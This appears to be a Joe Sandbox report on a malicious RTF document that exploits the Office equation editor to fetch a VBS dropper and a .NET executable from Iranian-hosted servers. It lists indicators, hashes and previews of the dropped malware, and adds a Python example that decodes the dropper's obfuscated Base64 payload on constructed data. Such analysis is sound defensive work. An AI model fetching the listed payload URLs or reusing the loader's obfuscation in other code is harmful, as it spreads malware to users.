          Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 9 other signatures

          Process tree (as drawn in the behavior graph):
          WINWORD.EXE (291 13) started
            -> EQNEDT32.EXE (12) started; a second EQNEDT32.EXE started
               Network: 185.235.137.223, 49165, 80 AFRARASAIR Iran (ISLAMIC Republic Of)
               Dropped: C:\Users\...\seethedifferentofpicture.vbs, ASCII; C:\Users\...\seethedifferentofpicture[1].vbs, ASCII
               Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
               -> wscript.exe (2) started
                  Dropped: C:\Users\user\AppData\...\temp_executable.exe, PE32
                  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  -> temp_executable.exe (12 2) started
                     Network: dl.zerotheme.ir 185.18.213.20, 443, 49166, 49167 SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR Iran (ISLAMIC Republic Of)
                     Signatures: Multi AV Scanner detection for dropped file; Installs new ROOT certificates; Machine Learning detection for dropped file; 3 other signatures
                     -> aspnet_compiler.exe started

Source | Detection | Scanner | Label
eMJ2QgQF4u.rtf | 47% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\temp_executable.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\temp_executable.exe | 21% | ReversingLabs |
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dl.zerotheme.ir | 185.18.213.20 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exe | true | | unknown
https://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll | true | | unknown
http://185.235.137.223/90/seethedifferentofpicture.vbs | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.entrust.net/server1.crl0 | temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exebhttps://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll | temp_executable.exe, 00000006.00000002.378697765.000000000257F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://ocsp.entrust.net03 | temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.235.137.223/90/seethedifferentofpicture.vbso | EQNEDT32.EXE, 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://dl.zerotheme.irX | temp_executable.exe, 00000006.00000002.378697765.000000000261B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.diginotar.nl/cps/pkioverheid0 | temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dl.zerotheme.ir | temp_executable.exe, 00000006.00000002.378697765.000000000265F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://185.235.137.223/90/seethedifferentofpicture.vbsj | EQNEDT32.EXE, 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.entrust.net0D | temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.entrust.net/2048ca.crl0 | temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://dl.zerotheme.ir | temp_executable.exe, 00000006.00000002.378697765.000000000261B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
Note: these strings are carved from process memory dumps. Trailing characters such as 0, 03, 0D, X, o and j are adjacent bytes picked up by the string extraction (for the CRL/OCSP entries, ASN.1 length bytes of the certificate they sit in), not part of the URL; the CRL, OCSP and CPS entries belong to certificate chains and fit the "Installs new ROOT certificates" behaviour rather than being contacted infrastructure. The indicators to act on are dl.zerotheme.ir and 185.235.137.223.
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.235.137.223 | unknown | Iran (ISLAMIC Republic Of) | 202391 | AFRARASAIR | true
185.18.213.20 | dl.zerotheme.ir | Iran (ISLAMIC Republic Of) | 44285 | SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | true
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1520425
                                          Start date and time:2024-09-27 10:56:07 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 7m 9s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:12
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:eMJ2QgQF4u.rtf
                                          renamed because original name is a hash value
                                          Original Sample Name:d805f910e1756735e34523281088f2ed.rtf
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winRTF@9/10@1/2
                                          EGA Information:
                                          • Successful, ratio: 66.7%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 38
                                          • Number of non-executed functions: 53
                                          Cookbook Comments:
                                          • Found application associated with file extension: .rtf
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Active ActiveX Object
                                          • Scroll down
                                          • Close Viewer
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 3340 because there are no executed functions
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: eMJ2QgQF4u.rtf
Time | Type | Description
04:56:59 | API Interceptor | 287x Sleep call for process: EQNEDT32.EXE modified
04:57:02 | API Interceptor | 72x Sleep call for process: wscript.exe modified
04:57:04 | API Interceptor | 66x Sleep call for process: temp_executable.exe modified
04:57:11 | API Interceptor | 3x Sleep call for process: aspnet_compiler.exe modified
Joe Sandbox View context: IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.235.137.223 | QT2Q1292.xla.xlsx | malicious | FormBook | 185.235.137.223/90/seethedifferentofpicture.vbs
185.235.137.223 | RFQ_0230909024SEPT.xla.xlsx | malicious | Remcos | 185.235.137.223/200/NRSCER.txt
185.235.137.223 | buttersmoothcrashcandy.rtf | malicious | Unknown | 185.235.137.223/69/shoppingfestivalsessiononherewithyou.tIF
185.18.213.20 | QT2Q1292.xla.xlsx | malicious | FormBook |
Joe Sandbox View context: Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
dl.zerotheme.ir | QT2Q1292.xla.xlsx | malicious | FormBook | 185.18.213.20
Joe Sandbox View context: ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AFRARASAIR | QT2Q1292.xla.xlsx | malicious | FormBook | 185.235.137.223
AFRARASAIR | RFQ_0230909024SEPT.xla.xlsx | malicious | Remcos | 185.235.137.223
AFRARASAIR | buttersmoothcrashcandy.rtf | malicious | Unknown | 185.235.137.223
AFRARASAIR | SecuriteInfo.com.Linux.Siggen.9999.15938.22369.elf | malicious | Mirai | 185.49.104.3
AFRARASAIR | an3gpDV7uW.exe | malicious | LummaC | 185.235.137.54
AFRARASAIR | paTWrNAira.exe | malicious | LummaC | 185.235.137.54
AFRARASAIR | 2gQsoHaGEm.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 185.235.137.54
AFRARASAIR | xvJv1BpknZ.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 185.235.137.54
AFRARASAIR | PxuZ1WpCgf.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 185.235.137.54
AFRARASAIR | TEILll7BsZ.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 185.235.137.54
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | QT2Q1292.xla.xlsx | malicious | FormBook | 185.18.213.20
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | https://monogogo.info/JQJMLAWN#em=npaladino@bigge.com | malicious | Phisher | 45.140.247.113
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | qD7cj0t7Ag.elf | malicious | Mirai, Moobot | 45.140.242.232
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | mDjOa15q8T.elf | malicious | Mirai | 45.140.241.81
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | NiAsQEhh9p.elf | malicious | Mirai | 45.156.181.90
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | enEQvjUlGl.elf | malicious | Mirai | 45.140.241.74
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | InLf78j8qW.elf | malicious | Mirai | 45.140.242.215
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | 4KXNneQz0d.elf | malicious | Unknown | 185.182.248.108
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | hAs0X5MYKz.elf | malicious | Mirai | 45.140.242.239
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR | xbcp1b1Dph.elf | malicious | Mirai | 45.156.193.94
Joe Sandbox View context: JA3 Fingerprints
Match | Associated Sample Name / URL | Detection | Threat Name | Context
36f7277af969a6947a61ae0b815907a1 | QT2Q1292.xla.xlsx | malicious | FormBook | 185.18.213.20
36f7277af969a6947a61ae0b815907a1 | Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | 185.18.213.20
36f7277af969a6947a61ae0b815907a1 | Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 185.18.213.20
36f7277af969a6947a61ae0b815907a1 | Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger | 185.18.213.20
36f7277af969a6947a61ae0b815907a1 | Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | 185.18.213.20
36f7277af969a6947a61ae0b815907a1 | BANK PAYMENT COPY.doc | malicious | XWorm | 185.18.213.20
36f7277af969a6947a61ae0b815907a1 | 14bnOjMV2N.doc | malicious | Unknown | 185.18.213.20
36f7277af969a6947a61ae0b815907a1 | 6b58b6.msi | malicious | PureLog Stealer | 185.18.213.20
36f7277af969a6947a61ae0b815907a1 | RFQ_PO_KMM7983972_ORDER_DETAILS.js | malicious | AgentTesla, RedLine | 185.18.213.20
36f7277af969a6947a61ae0b815907a1 | RFQ.vbs | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | 185.18.213.20
Joe Sandbox View context: Dropped Files
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\temp_executable.exe | QT2Q1292.xla.xlsx | malicious | FormBook |
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:ASCII text, with very long lines (65399), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):92431
                                              Entropy (8bit):4.8789339351328405
                                              Encrypted:false
                                              SSDEEP:1536:35VT1rG9XgL21xU47L2HiUYxd9jd4Qyxsyf4SgfAw2zXdcp2bF+Z:JPG9pxh7L2SxKsu4SU0u2bI
                                              MD5:7834CBAFCFAD72B1BDA091F3CCE8E997
                                              SHA1:034AFCB22B254090084269FC8BCD68F64E4A85A8
                                              SHA-256:AAC62555CF55C081E503636CF2D696AB33A789B9D10DDC8A9EF2ED8014890913
                                              SHA-512:FA08EF7847F8F98A6E2442DB45935FBAA30D0C0CD26ABF457F8579FFDACE28D7851D5BBDC7630406C5FCFE74381241ACCD74B72E4DD79E194E1FD481BC06CFFF
                                              Malicious:true
                                              Reputation:low
                                              Preview:' Main script logic for processing Base64-encoded data....' Initialize the Base64 encoded string (placeholder)..Dim encodedBase64String..encodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@))@@ED@@Fvx9GY@@@@@@@@@@@@@@@@@@@@O@@@@DgEL@@))@@@@@@I@@@@@@@@C8@@@@@@@@@@@@@@@@Ep4@@@@@@@@g@@@@@@@@o@@@@@@@@@@...@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@...@@@@@@...@@@@@@@@@@@@E@@@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Lid@@@@...X@@@@@@@@@@M@@@@@@@@Q7@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@K@@@@@@@@w@@@@@@CwSQ@@@@H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@@@@C@@@@@@@@@@@@@@@@@@@@@@@
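The preview above carries the second stage as a Base64 blob whose alphabet has been tampered with: lining it up against the Base64 of a standard PE DOS header and stub shows "TVqQAAMAAAAEAAAA" rendered as "));;;qQ@@@@M@@@@" and "VGhpcyBwcm9ncmFt" as ";;;Ghpcy...wcm9ncmFt", so A, T, V, J and B have each been replaced by a multi-character token. The following is an added example, not the script's own code: it reverses the substitutions that are visible in the preview, Base64-decodes the result and checks that what comes out is a PE. The token mapping is an inference from the preview alone (the "..." shown for B may be three literal dots or the viewer's rendering of three non-printable bytes), the full script may use substitutions the preview does not show, and the sample VBS fragment and payload are constructed here so the code runs offline.

```python
"""Recover the PE carried by the dropped VBS above.

Added example, not the script's own code. The preview shows a Base64 blob in
which some alphabet characters are replaced by multi-character tokens. The
mapping below is inferred by lining the preview up against the Base64 of a
standard PE DOS header and stub ("TVqQAAMAAAAEAAAA..." appears as
"));;;qQ@@@@M@@@@..."); it is an assumption limited to what the preview shows.
"""
import base64
import re

# token in the obfuscated text -> Base64 character it stands for (inferred)
TOKEN_TO_BASE64 = {
    "@@": "A",
    "))": "T",
    ";;;": "V",
    "&&&": "J",
    "...": "B",  # uncertain: the preview may be rendering non-printable bytes as dots
}
_NOT_BASE64 = re.compile(r"[^A-Za-z0-9+/=]")
# the assignment the preview shows: encodedBase64String = "..."
_ASSIGN = re.compile(r'encodedBase64String\s*=\s*"([^"]*)"')


def extract_blob(vbs_text: str) -> str:
    """Pull the quoted blob out of the encodedBase64String assignment."""
    m = _ASSIGN.search(vbs_text)
    if not m:
        raise ValueError("encodedBase64String assignment not found")
    return m.group(1)


def deobfuscate(text: str) -> str:
    """Undo the token substitution (longest tokens first), then repair padding."""
    for token, plain in sorted(TOKEN_TO_BASE64.items(), key=lambda kv: -len(kv[0])):
        text = text.replace(token, plain)
    text = _NOT_BASE64.sub("", text)  # drop stray quotes, line breaks, unknown junk
    return text + "=" * (-len(text) % 4)


def decode_payload(text: str) -> bytes:
    return base64.b64decode(deobfuscate(text), validate=True)


def looks_like_pe(data: bytes) -> bool:
    """MZ magic plus a PE\\0\\0 signature at e_lfanew; enough to triage the result."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def obfuscate(data: bytes) -> str:
    """Forward direction; used only to build the constructed sample below."""
    text = base64.b64encode(data).decode("ascii")
    for token, plain in TOKEN_TO_BASE64.items():
        text = text.replace(plain, token)
    return text


def build_sample_pe() -> bytes:
    """Constructed stand-in for the payload: a standard DOS header and stub
    followed by a bare PE signature. Not a runnable executable."""
    hdr = bytearray(64)
    hdr[0:2] = b"MZ"
    hdr[2:4] = (0x90).to_bytes(2, "little")      # e_cblp
    hdr[4:6] = (3).to_bytes(2, "little")         # e_cp
    hdr[8:10] = (4).to_bytes(2, "little")        # e_cparhdr
    hdr[12:14] = (0xFFFF).to_bytes(2, "little")  # e_maxalloc
    hdr[16:18] = (0xB8).to_bytes(2, "little")    # e_sp
    hdr[24:26] = (0x40).to_bytes(2, "little")    # e_lfarlc
    stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            b"This program cannot be run in DOS mode.\r\r\n$").ljust(64, b"\0")
    hdr[0x3C:0x40] = (64 + len(stub)).to_bytes(4, "little")  # e_lfanew
    return bytes(hdr) + stub + b"PE\0\0"


def build_sample_vbs() -> str:
    """Constructed script fragment in the shape of the preview."""
    return ("' Main script logic for processing Base64-encoded data.\r\n"
            "Dim encodedBase64String\r\n"
            f'encodedBase64String = "{obfuscate(build_sample_pe())}"\r\n')


if __name__ == "__main__":
    payload = decode_payload(extract_blob(build_sample_vbs()))
    print(len(payload), "bytes, PE:", looks_like_pe(payload))
```

Because none of the tokens use characters from the Base64 alphabet, the replacements cannot collide and a plain longest-token-first pass is enough; if the real script turns out to substitute further characters, the decoded bytes will fail the PE check rather than silently producing garbage, which is the point of validating the output instead of trusting the decoder.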
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:CE338FE6899778AACFC28414F2D9498B
                                              SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                              SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                              SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16896
                                              Entropy (8bit):3.5808522768349413
                                              Encrypted:false
                                              SSDEEP:384:Q/VXbEoRIdt1LMnoeC26GFYQuLJa18JRdZv8gk8J2+Dgrz:Q/VbIAnoeC26AUU18Fq58J2drz
                                              MD5:C3900D55C838EED92A89FFA290B7C99B
                                              SHA1:EA360506A8DB8C6872A1C2217B0E8F25B33D7DAC
                                              SHA-256:8CB86A7C206AA1D334651A47D3E817453EE8C9B78638E6D07BC22E3C03F9B037
                                              SHA-512:5F903468D2A47C20F97D6D715DEE7B5827BE971A6CBF4CD37F74E4A03E808F931627C09CF136BE92DDAE879A374C82C5C852C53BF88B5BA8B31734BEE011ECAD
                                              Malicious:false
                                              Preview:4.6.2.0.6.8.8.%.=.-.).~.6.1.../.$.?.$.9.;.).?.2...=.&._.-.&.~.?.@.,.+.,.^.).'...~.4.&.|.?.#.6.?.?.~.1.;.!.=...+.`.@.'.1.>.!.?.7.).?.[.5...?.%.|.%...,.2.8._.^...*...4..._.?._.1.+.0.&.%.1.%.)...$...~.[.[.>.&.`.?.?.8.0.'...*.!...(.-...|.?.~...?.>.`.?.0.:.`.8.$.).~.-.;...#.?.+...~.@.;.9.3.-.`.-.-.?.>.`...#.?.5.).8.0.2.?.7.].=.9.*.;.2.*.<.^...+.5.:.$.9.7.1._.:.%.7...?.=...6...+.=.;.?.;.4...~.%.,...?.8.?.6.?.-.?.@...#.8._.2./.6.<.8.#...'.[.<.?.$.:...).4.7.3.5.6.-.,.&.|.?.>.'.(.5.#.?.|.;.[.*.@...$.3.1./.).*.3.%.@.%.*.3...3.6.$.5.+.'.?.'.^.4.(.,...,.0.@.9.;...%.^.^...+.#.....+.?.#.;.,.>.;.-.#...,.1.1.2...?.].]...`...*.:.'.<.0.....&.%.:.~...7.^.%.?.?.9.5.'.).5.#.4.?.%.&...`.,.9.,.,...?.0.2.~./.=.].&.-.0.(.[.-.|.+.~.[.|.&.3.1._.7.9.|.%.1.3.%./.....:.?.*.^.7...].4.?.?...?./._.6...;.!.?.!.~.7.;.=.....5.%.0.;.7.5.4.?.3.6.>.5.!.;.=.0...?.9.<.;.>.^.?...5.&./.8.?.;.-.3.6.:._.@...^.0.?.;.*.0.`.|.=.;...?.8.2.4.?.7.%.+.%.).2...>.:.).2.=._.*._./.>.?.9._...<.%.).,.*.^.3.5.'.'.?.|...?.$.?.!.~.....|.9.!.).?.
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\wscript.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):49152
                                              Entropy (8bit):6.632984721949493
                                              Encrypted:false
                                              SSDEEP:768:Ua9FDkXneHCBXyDMLNe9rotBMx251CBXWZBiGRO4TjPZcVP+LWcwTQ1qsL8:Ua92XeiBCd9/o+XWgGRO4HPmN7TQ1tL8
                                              MD5:3E01AC27E853080CA5C92470DF3F738C
                                              SHA1:41B6C3DF03856DDF7A5BA505900A9499A6ABADA1
                                              SHA-256:E350330729257731AC3E4CB80CFCB243F8FD629A2AB5BC11D7A1E89B3945C716
                                              SHA-512:2D4A0A638274A2A3B1B5E6A48E7BFC9A96C8FC113E49A6D89BD4ED3B63B3B3A9410258AA47DE79741C55ADAF24DE417D474CA5971784684870FA469F7C017DFF
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 21%
                                              Joe Sandbox View:
                                              • Filename: QT2Q1292.xla.xlsx, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..f..............0.................. ........@.. ....................................`.....................................W........;...........................I............................................... ............... ..H............text....~... ...................... ..`.reloc..............................@..B.rsrc....;.......<..................@..@........................H.......,J...S...........@..............................................".(.....*....0...........($.....*....0..[........~....~t.......,@.E.........-......&..("...%&(....%&(....%&(....%&(....%&........~.....+..*..0...........~.....+..*..0.................*.0...........(N...*..0...........(O....*.0..........s....(....%&(....%&.....*....0...........~.....+..*..0..K.......(...........sP...(....(....%&.......sP...(....(\.....(....%&..(h...%&.....*..0...........($...*..0..........
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Fri Sep 27 07:56:57 2024, length=108966, window=hide
                                              Category:dropped
                                              Size (bytes):1014
                                              Entropy (8bit):4.5574923796151605
                                              Encrypted:false
                                              SSDEEP:12:8wZHae4FgXg/XAlCPCHaXEzBggB/5YXX+WZWIO2IOicvbsAp5A4K2IeDtZ3YilMQ:8wVjc/XTUzN4XBIteFTIeDv3qai57u
                                              MD5:0188A679B4E9A1EFD8BE440A7CC3F68D
                                              SHA1:5FFFC8D990B2577344ECB5D2BE8572E056E31DE4
                                              SHA-256:EB3DC5D5C31B9CD0B461D7D492F20D0A11A2827F5645B830E8735469AF6A2071
                                              SHA-512:80DACE63F27099D2BC3F82194E6AB819D2AC824B7C707C8B33B8E983F5A5F037CC3A62A6B08765B9006D7749B09AE78B8852DA8D1E80FE4075443C53171A7062
                                              Malicious:false
                                              Preview:L..................F.... ...:..r...:..r.....(5.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....;Y.G..user.8......QK.X;Y.G*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....;Y.G .EMJ2QG~1.RTF..J.......WE..WE.*.........................e.M.J.2.Q.g.Q.F.4.u...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\528110\Users.user\Desktop\eMJ2QgQF4u.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.M.J.2.Q.g.Q.F.4.u...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......528110..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Generic INItialization configuration [folders]
                                              Category:dropped
                                              Size (bytes):55
                                              Entropy (8bit):4.676725395303504
                                              Encrypted:false
                                              SSDEEP:3:HLyXWRv4om4FPWRv4ov:HLrv41v4y
                                              MD5:0D49BA26A9D1E5B057B4526E99CF43AA
                                              SHA1:01A558006DBDB62C980C4323016F92BDE57B4AB2
                                              SHA-256:639AD2BCE35E3B66571B386156B458BE22AEC66269181717458AA7C6A76EB06E
                                              SHA-512:68F10E111469235B5A4E0782B399C17EFE84FC56D7E86123A1D63D3172BC1BBCC931E9052FF00E65696DD691ABE19F3AA72169180EEB14347A4C8B8D5A3550DC
                                              Malicious:false
                                              Preview:[misc]..eMJ2QgQF4u.LNK=0..[folders]..eMJ2QgQF4u.LNK=0..
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyyAGlY5mWSyePAi/lln:vdsCkWtA9/idl
                                              MD5:782B772E21E6B8EFB11B235130F050A6
                                              SHA1:D841FB557392C38D7B7F5EF52F03D6FA77DAD0EC
                                              SHA-256:F69766E15E5E7AFF3E540B8B098B618172F5350CBDFA757D4CFD9071A5DA37E8
                                              SHA-512:DAB38260CE9D0C9C11478D982B6672058BF07CCD28DB4CB36F8112252BEE9D34EA55F07364BCF2883A8CB211AA7701D877B7827CF0EB7BC8E19DA7249C456849
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
